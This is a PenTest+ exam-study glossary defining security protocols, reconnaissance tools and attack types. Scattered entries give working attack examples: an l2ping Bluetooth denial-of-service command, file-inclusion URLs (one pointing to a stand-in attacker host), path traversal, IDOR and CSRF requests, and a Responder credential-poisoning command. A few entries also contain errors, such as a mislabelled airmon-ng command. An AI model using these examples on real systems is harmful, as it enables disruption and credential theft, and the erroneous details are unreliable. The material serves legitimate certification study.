CompTIA PenTest+ Key Terms
What is Simple Mail Transfer Protocol (SMTP)?
Simple Mail Transfer Protocol (SMTP) is defined under RFC 5321 to allow for the delivery of electronic mail. SMTP servers listen on port 25/tcp and use a mail transfer agent (MTA) called Send Mail to deliver email to the designated address. Among the weaknesses found with Send Mail are servers configured to be open mail relays, which allow anonymous users to connect over the Internet to send email as an impersonated email address to both external and internal destination addresses.
What is SNMP?
Simple Network Management Protocol (SNMP) is an application-layer network-monitoring protocol, originally defined under RFC 1157. SNMP provides the functionality to collect and organize information about devices over the network and allows for the protocol to make changes to the device's behavior, such as enabling or disabling a client's network interface. SNMP typically listens on the default port of 161/udp.
What is system on a chip (SoC)?
SoC is a small, integrated circuit that connects together common components that make up a mobile device, such as • Central processing unit (CPU) • Graphical processing unit (GPU) • Random access memory (RAM) • Read-only memory (ROM) • Modem SoC are designed to reduce overall system costs, increase performance, and lower power consumption.
What is clickjacking?
The attacker uses transparent or opaque layers (images) to send users to a destinatino other than where they intended to go. Don't click there!
What is Waterholing?
Waterholing is a technique used to capitalize on a target's trust relationship with websites they commonly visit. This strategy targets a particular group, where an attacker observes websites the group frequents on a regular basis and infects one of the sites with malware.
What is Parameter Pollution?
A form of authorization attacks. Passing multiple duplicate parameters to see how the site reacts. Normail: http://www.site.com/?search=pizza Attack: http://www.site.com/?search=pizza&search
What is a property list (plist) file?
Every iOS application uses a property list (plist) file, which a plist file is used to store configuration data about the app. These files are subject to information disclosure attacks and can be modified to bypass application restrictions.
What is FOCA?
For metadata analysis, if you open up a Microsoft Word document, then click Info (or the File tab, depending on the version of Word you are using)you will see the property information stored for the document. Fingerprinting Organizations with Collected Archives, or FOCA for short, is a Microsoft Windows-based tool used to automate this discovery process. Listed below are supported file types: .xls .doc .pdf .sxw
What is Phone Validator?
From the OSINT Framework website, click on Telephone Numbers. This will provide a list of options to use for researching phone numbers discovered during the collection process. The Phone Validator is a website that will assist with determining if a phone number is a landline or a cell phone.
What is ad-hoc wireless network mode?
In this mode, wireless clients (stations or STA) are connected in a peer-to-peer mode, and this is commonly referred to as an Independent Basic Service Set (IBSS). This is the least common approach, and is least likely to be found in most pentest engagements. Figure 3-1 provides a basic example of computers configured in ad-hoc mode.
What is JTAG?
JTAG, which stands for Joint Test Action Group, is a type of hardware mechanism used for debugging and connecting to embedded devices on a circuit board. JTAG is an industry standard recognized in IEEE Std 1149.1.
What is Cross-Site Scripting (XSS)?
Similar to HTML injection but includes injecting JavaScript that executes on the target's browser. - stored XSS stays on a trusted server (Web Forum post) - reflected XSS executes on the victim's browser - testing by entering script into the input field or URL
What is Bluesmacking? (Eliciting Unwanted Messages)
Similar to the "ping of death" or ICMP flood attack, bluesmacking is a type of DoS attack that targets echo requests from a Bluetooth peer over the L2CAP layer using an L2CAP ping. The attacker can send an oversized packet to the target using L2CAP ping in order to crash the service. The l2ping command can be used in Kali Linux to deny service to a Bluetooth peer: # l2ping -s <size of packet> <target MAC address>
DNS forward lookup vs DNS reverse lookup
- DNS forward lookup will ask the DNS server to provide the IP address for a given FQDN - Reverse lookup will ask the DNS server to do the opposite, and provide the FQDN for an IP address
What is File Inclusion Attacks?
- Remote File Inclusion (RFI): Attackers reference a file on antoher server ex: http://site.com/page.php?font=http://badguy.com - Local File Inclusion (LFI): Attacker can exploit this to access files local to the server ex: http://site.com/page.php?font=../../Windows/system32/cmd.exe%00
What is Cross-Site Request Forgery Attacks (XSRF/CSRF)?
- Tricks the victim into submitting malicious requests by taking advantage of the trust between the application and the browser. - very hard to detect - Attacker sends a link to target with embedded actions - GET http://bank.com...transer funds to attacker
What is bluejacking/
- sending unwanted bluetooth signals to devices - can be text based messages video or images - simple annoyance, not hijacking a device - can be used in social engineering attacks
What is bluesnarfing?
- the act of reading information off of a device via bluetooth (contacts, emails, texts) - bluetooth used Object Exchange (OBEX) protocol to commnicate. - Uses OBEX to connect to a devices OBEX Push Profile (OPP) - Then send OBEX GET requests (telecom/devinfo.txt -> info about the device, telecom/pb.vcs -> phone book)
What port does Simple Mail Transfer Protocol (SMTP) use?
25/tcp
What port does Modbus, the SCADA systems protocol, use?
502/tcp
What is Recon-ng?
A powerful web reconnaissance framework, very similar to theHarvester and written in Python, is Recon-ng. The environment is very Metasploit-like, in that it includes independent modules, a database for storing engagement information, and much more. The recon-ng module categories are • Recon modules Reconnaissance modules • Reporting modules Compile a report in various formats • Import modules Import target listing using supported formats • Exploitation modules Supported exploitation modules • Discovery modules Informational discovery modules
What is Aircrack-ng?
Aircrack-ng (https://www.aircrack-ng.org) is open-source software that provides a suite of tools for conducting RF communication monitoring and security testing of Wi-Fi networks.
What is Airodump-ng?
Airodump-ng is a popular wireless sniffing tool included with the aircrack-ng toolset that can be used during a pentest to discover and validate wireless targets. Airodump-ng helps identify the ESSID and BSSID of access points and any station/client MAC address that is associated with the AP, including various attributes like the channel it is connected to, the transfer speed, and access control (encryption) for connecting to the AP.
Define Master service agreement (MSA)
An MSA is a type of overarching contract reached between two or more parties where each party agrees to most terms that will govern all other future transactions and agreements. The agreement will cover conditions such as • Payment terms Negotiated schedule of payment • Product warranties Assurance that a product meets certain conditions • Intellectual property ownership Copyrights, patents, and trademarks • Dispute resolution Defines a process for resolving differences • Allocation of risk Provision that defines levels of responsibility between each party • Indemnification Parties agree to be financially responsible in certain circumstances This type of service agreement may also cover other items, such as corporate social responsibility, business ethics, network and facility access, or any other term critical for all future agreements.
What is DNS Spoofing?
An attack method used to impersonate a victim's DNS server, forcing them to navigate to a malicious website. DNS spoofing is accomplished using man-in-the-middle (MiTM) techniques to monitor and impersonate response messages to spoof legitimate hosts. The goal is to exploit the target with a malicious redirect or steal sensitive information from a fake web page, such as impersonating a Facebook login page. Ettercap (https://www.ettercap-project.org) is a tool that pentesters can use to conduct MiTM attacks against various protocols, to include DNS.
Define ping scan
An nmap ping scan (-sn or -sP flag) is a simple method of determining if a host is alive on the network. The ping scan utilizes the layer 3 Internet Control Message Protocol (ICMP) for sending ping probes to hosts over the network. Hosts communicate over the network using ICMP messages, which are defined as specific types and codes that determine the state of the communication. A ping scan will send a type 8 message (ECHO request) to the target host. If a host is alive, it will respond to the source of the request with a type 0 message (ECHO reply).
What is Insecure Direct Object Reference (IDOR)?
Auth Attack where passing substitute parameters to see what is returned Normal: http://www.site.com/?somepage?invoice=12345 Attack: http://www.site.com/?somepage?invoice=9999 (substituted values)
What is a broadcast storm in networking?
Broadcast storms caused by loops in the network, where a broadcast frame is bounced back and forth between switches, due to redundant paths. A broadcast storm could cause entire segments of the local network to become unavailable should one of the redundant links fail, STP helps prevent this.
What is MAC address table thrashing?
Caused by two different ports on a switch broadcasting the same source MAC address and prevented by eliminating redundant loops.
What is Censys?
Censys works very much the same way as Shodan, as it allows users to query using keywords and filters to discover and investigate devices, and to include public-facing IP addresses and domain names with open ports and services on the Internet. The interface provides an intuitive search feature that allows the user to query for just about anything, but more specifically ports, protocols, services, operating systems, locations, etc. Censys data is grouped into three views (categories): IPv4 Hosts, Top Million Websites, and Certificates. Censys provides additional information and resources regarding query syntax, example queries (like popular websites without browser trusted certificates), and data definitions through the help portion of their website. Filter options include: AS, protocol, and tag Filter example: (telnet) AND protocols.raw: "23/telnet"
What is center frequency?
Center frequency is the measure between the upper and lower cutoff frequencies of a channel. In the 2.4 GHz spectrum, each channel is separated by 5 MHz within the lower, center, and upper frequencies. In the 5 GHz spectrum band, each channel is separated by 10 MHz within the lower, center, and upper frequencies.
Define CWE
Common Weakness Enumeration or CWE provides a list of common software security weaknesses and mitigations for implementing good secure coding practices and software design. CWE has over 700 common software security weaknesses that are broken up into three categories, which evaluate each problem from a different point of view: • Research concepts Intended for academic research • Development concepts Weaknesses encountered during software development • Architectural concepts Weaknesses encountered during software engineering CWE includes basic set of identifiers including: weakness ID, description, relationships to other views, modes of introduction, applicable platforms, common consequences, likelihood of exploit, potential mitigations, memberships
What is Maltego CE?
Community edition of Maltego that ships with Kali Linux and is an interactive data mining software tool that can help users visualize and analyze relationships using publicly accessible data from the Internet is called Maltego. It is a framework that can rapidly expand the open-source knowledge of a target during a pentest.
Define Rules of Engagement (ROE)
Detailed guidelines and constraints regarding the execution of information security testing. The ROE is established before the start of a security test, and gives the test team authority to conduct defined activities without the need for additional permissions. he RoE can be part of the SOW or treated as a separate deliverable. This document requires signatures from the service vendor as well as organizational management who have the appropriate authority to exercise testing for the organization. Cloud service provider approvals may also need to be added as an appendix to the RoE, if applicable.
What is a 'WHOIS' search?
Discovering domain names, public-facing websites, and email addresses is an important part of footprinting an organization during an assessment. The WHOIS directory service was developed back in the 1980s to look up domain registration information from registry databases administered by multiple registries and registrars around the world. The output can provide useful information that can help identify domain creation date, when it was last updated, associate a company and business location for the domain, DNSSEC information, and in some cases, contact information of the registrar.
What is the Drozer tool?
Drozer is a security auditing framework for Android that can help pentesters identify vulnerabilities and validate them with exploitation. The Drozer agent is installed on the Android device, and the console is installed on your laptop.
What is DAST?
Dynamic and runtime analysis is the process of executing and testing a program in real-time, also known as dynamic application security testing (DAST). DAST is a type of black-box testing methodology used to evaluate the security effectiveness of an application (mobile or web) from the outside by investigating its running state. During a mobile pentest, this process can help assess the security configuration of the device and the application from the user's perspective. This type of analysis includes • Brute-force the PIN or pattern lock on the device • Binary attacks against the mobile app to escalate privileges • Client-side injection attacks (e.g., SQL injection) • Assess application functions when the PIN or pattern lock on the device is not enabled • Copy and paste buffer caching • Sensitive information stored in memory • Evaluate shared application data storage
What is infrastructure network mode?
Infrastructure mode is the most common configuration in both home and commercial applications. In infrastructure mode, the wireless clients communicate with a central device called a wireless access point (AP) instead of directly communicating with each other, like in ad-hoc mode. This is often referred to as a Basic Service Set (BSS) or wireless local area network (WLAN). The AP manages the wireless network and broadcasts a case-sensitive, 32-alphanumeric character Service Set Identifier (SSID) to advertise its existence. The SSID is the name of the WLAN. Wireless clients can associate with an AP when they are in range and are configured to use the same SSID.
What is Windows Proxy Auto-Discovery Protocol (WPAD)?
Microsoft Windows clients connect to the WPAD server to obtain and configure the automatic web proxy settings for Internet Explorer. This functionality is enabled by default on most versions of Windows. In the event the Windows host cannot resolve the WPAD server host name through DNS, it will send LLMNR and NBNS queries over the network. Responder can be configured to start a WPAD listener, force basic HTTP authentication (no encryption), and prompt a user to enter a username and password before browsing to the website. When Responder sees a request for "wpad," it will poison the answer sent to the Windows host. The user will be prompted to enter a username and password, and when the user clicks OK, the credentials will be captured by Responder.
What is Mobile Security Framework (MobSF)?
Mobile Security Framework (MobSF) is an all-in-one, automated pentesting framework for mobile applications for Android, iOS, and Windows platforms. It is a software assurance tool, software assurance testing helps provides assurance that the software is free and clear of bugs, and binary analysis is a way to evaluate bugs in compiled software.
What is NASL?
Nessus Attack Scripting Language, it's the language that Nessus plugins are written in.
What is bluebugging? (Data Exfiltration and Compromise)
Older phone models with Bluetooth technology have been found to have a bug that enables complete command and control of the mobile device. This method of attack is called bluebugging. The process starts by sending a message to the Bluetooth-enabled device (usually in the form of an electronic business card). By interrupting the process used to send the card, an attacker can remain listed in the phone as a trusted device. From there, the attacker can pair to the device headset and issue modem attention (AT) commands to take control of the device. Modern firmware updates and the use of PINs during the Bluetooth pairing process have all but eliminated this conventional method of attack.
What is bluejacking? (Eliciting Unwanted Messages)
One method of sending unsolicited messages to mobile users is called bluejacking. This method transmits data to the device without the knowledge of the user. Typically, this type of attack can be carried out by sending an electronic business card via Bluetooth to an unsuspecting victim. Instead of putting a real name in the name field, you can insert a sneaky message. To counter this type of attack, mobile phone makers limit the amount of time a phone can be in discovery mode for pairing. This helps lessen the window of attack against Bluetooth devices.
What is pretexting / pretext ?
Pretexting, or pretext for short, is a technique used to fabricate scenarios. During disastrous situations, either manmade (large data breaches) or due to Mother Nature (hurricanes, earthquakes, etc.), attackers will try and take advantage of a situation. If a large company gets hacked and personal and financial information is compromised, attackers may prey on the victims of the attack and fabricate a story to help provide credit monitoring services for a nominal fee.
What is the tool Responder?
Responder is an LLMNR, NBT-NS, and MDNS poisoner that can aid pentesters with poisoning name resolution services and compromising usernames and hash values with a rogue authentication server. Can be found in /usr/share/responder. ex: responder -I wlan0 -wfv -I = interface -w = proxy server. Default value is Off -f = This option allows you to fingerprint a host that -v = verbose
Define Risk
Risk = Probability * Damage Potential The scale is from 1 to 10, where 1 represents a risk that is less likely to happen (probability) or minimal damage will occur (damage potential) and 10 represents a risk that is likely to happen or maximal damage will occur. The risk can then be prioritized in three bands as either High (80-100; urgent), Medium (40-79; less urgent), or Low (1-39; nonurgent).
What is ATT&CK?
The ATT&CK knowledge base maintained by MITRE is another useful resource for pentesters. ATT&CK models the techniques and adversarial behavior that can be used to attack organizations. Pentesters can emulate this type of behavior during an engagement to represent real-world scenarios and help the customer determine the effectiveness of defensive countermeasures. The ATT&CK matrix breaks out each attack technique into a specific category for platforms such as Windows, Mac, and Linux. The categories covered in the ATT&CK matrix are • Initial access Used to gain an initial foothold within a network • Execution Technique that results in execution of code on a local or remote system • Persistence Method used to maintain a presence on the system • Privilege escalation Result of actions used to gain higher level of permission • Defense evasion Method used to evade detection or security defenses • Credentialed access Use of legitimate credential to access system • Discovery Post-compromise technique used to gain internal knowledge of system • Lateral movement Movement from one system over the network to another • Collection Process of gathering information, such as files, prior to exfiltration • Exfiltration Discovery and removal of sensitive information from a system • Command and control Maintaining communication within target network
What is CAPEC?
The Common Attack pattern enumeration and Classification (CAPEC) is a comprehensive dictionary consisting of thousands of known attack patterns and methodologies that are broken up into two distinct categories: domains of attack and mechanisms of attack, which are common methods used to carry out exploitation. Both categories consist of a collection of views that show relationships between various attack patterns. The CAPEC specifies six unique attack domains: • Social engineering: Exploitation and manipulation of people • Supply chain: Manipulating computer hardware/software within the supply chain lifecycle • Communications: Communication and protocol exploitation • Software: Exploitation of software applications • Physical security: Exploitation of physical security weaknesses (bypass, theft, or destruction) • Hardware: Exploitation of physical hardware used in computer systems
Define Nondisclosure agreement (NDA)
The NDA is a confidentiality agreement that protects a business's competitive advantage by protecting its proprietary information and intellectual property. It is in a company's best interest to execute an NDA during a pentest, especially when outsourcing the work to an external service vendor. In the event the organization is compromised, the vendor is obligated to maintain the secrecy of the privileged information it might obtain during the pentest.
What is the OSINT Framework?
The OSINT Framework is a static web page focused on information gathering and provides web links and resources that can be used during the reconnaissance process. The website is broken out into various nodes that offer unique paths for collecting information regarding a specific subject, such as usernames, email addresses, social networks, IP addresses, etc. The OSINT Framework helps point users in the right direction to find useful intelligence from various public and paid resources. An interactive data mining software tool that can help users visualize and analyze relationships using publicly accessible data from the Internet is called Maltego. It is a framework that can rapidly expand the open-source knowledge of a target during a pentest.
What is OWASP?
The OWASP project (https://www.owasp.org) is a nonprofit organization and open-source community effort, established in 2001, that produces tools, technologies, methodologies, and documentation related to the field of web application security.
Define Statement of work (SOW)
The SOW is a formal document that is routinely employed in the field of project management, which outlines project-specific work to be executed by a service vendor for an organization. An SOW can also be a provision found in the Master Service Agreement. It explains the problem to be solved, the work activities, the project deliverables, and the timeline for when the work is to be completed. The statement of work typically addresses the following subjects: • Purpose Reason for the project • Scope of work Describes the work activities to be completed • Location of work Where the work will be performed • Period of performance The timeline for the project • Deliverables schedule Defines the project artifacts and due dates • Applicable industry standards Relevant criteria that must be followed • Acceptance criteria Conditions that must be satisfied • Special requirements Travel, workforce requirements (certifications, education) • Payment schedule Negotiated schedule of payment (possibly derived from MSA)
What is Shodan?
The Shodan search engine scans the entire Internet, parsing banners for services and categorizing the data returned by each device. The main page provides a search box that can be used to examine content to find keywords or phrases. Advanced queries enable users to apply filters and boolean logic operators to drill down into the results. It works similar to a typical web search engine such as Google, Yahoo, or Bing. Filter example: telnet port:23 country:"US" You can search by service, OS, product, etc. and it will display the following • Top Countries • Top Services • Top Organizations • Top Operating Systems • Top Products The Reports button on the top menu bar provides a quick and painless way to generate a report based on the search criteria.
What is airmon-ng?
This script can be used to enable monitor mode on wireless interfaces. It may also be used to go back from monitor mode to managed mode. Entering the airmon-ng command without parameters will show the interfaces status. Ex: Checking for interfering processes: ~# airmon-ng check Killing interfering processes: ~# airmon-ng start wlan0 Enable monitor mode: ~# airmon-ng start wlan0 Disable monitor mode: ~# airmon-ng stop wlan0mon
How to conduct an smtp relay attack using metasloit module auxiliary/scanner/smtp/smtp_relay?
To demonstrate, a pentester can use Netcat, Telnet, or the Metasploit module auxiliary/scanner/smtp/smtp_relay to connect to port 25/tcp. After you connect with Netcat or Telnet, issue the VRFY or EXPN command using an internal email address in an attempt to enumerate local or domain users in the environment, for example, VRFY root. If the VRFY command is enabled on the relay server and the account doesn't exist, you will receive an error. VRFY is used to ask the server for information about an address, and EXPN is used to ask the server for the membership of a mailing list. If the EXPN command is successful, the server will show each subscriber to the mailing list. Nmap also provides an NSE called smtp-enum-users.nse that will automate the detection process for you using a much larger repository of possibilities.
What is the dig command?
dig - DNS lookup utility dig (domain information groper) is a flexible tool for interrogating DNS name servers. It performs DNS lookups and displays the answers that are returned from the name server(s) that were queried. Most DNS administrators use dig to troubleshoot DNS problems because of its flexibility, ease of use and clarity of output. Other lookup tools tend to have less functionality than dig. Ex: dig +qr www.isc.org any -x 127.0.0.1 isc.org ns +noqr
What is the nslookup command
nslookup command can be used to resolve the name of the domain to an IP address—this is called a forward DNS lookup. A reverse DNS lookup is the opposite—this process resolves the IP address to the domain name. Ex: nslookup yahoo.com 8.8.8.8 Server: dns.google Address: 8.8.8.8 Non-authoritative answer: Name: yahoo.com Addresses: 2001:4998:44:3507::8001 2001:4998:44:3507::8000 2001:4998:24:120d::1:1 2001:4998:124:1507::f001 2001:4998:24:120d::1:0 2001:4998:124:1507::f000 74.6.143.26 98.137.11.163 74.6.231.20 74.6.231.21 74.6.143.25 98.137.11.164
What is theHarvester?
theHarvester is another tool like sublist3r which is developed using Python. This tool can be used by penetration testers for gathering information of emails, sub-domains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database. ex: theharvester -d example.com -b google -d = domain to search -b = data source -s = start in result number X (default: 0) -n = perform DNS reverse query on all ranges discovered -e = use this DNS server -h = use shodan database to query discovered hosts
What are the primary layers of bluetooth?
• SDP Service Discovery Protocol discovers Bluetooth services offered from other devices within range. • LMP Link Managing Protocol keeps track of connected devices. • L2CAP Logical Link Control and Adaptation Protocol provides data services to upper layers of the bluestack protocol. • RFCOMM Radio Frequency Communication uses L2CAP to provide emulated serial ports to other devices. • TCS Telephony Control Protocol uses L2CAP and provides telephone functionality.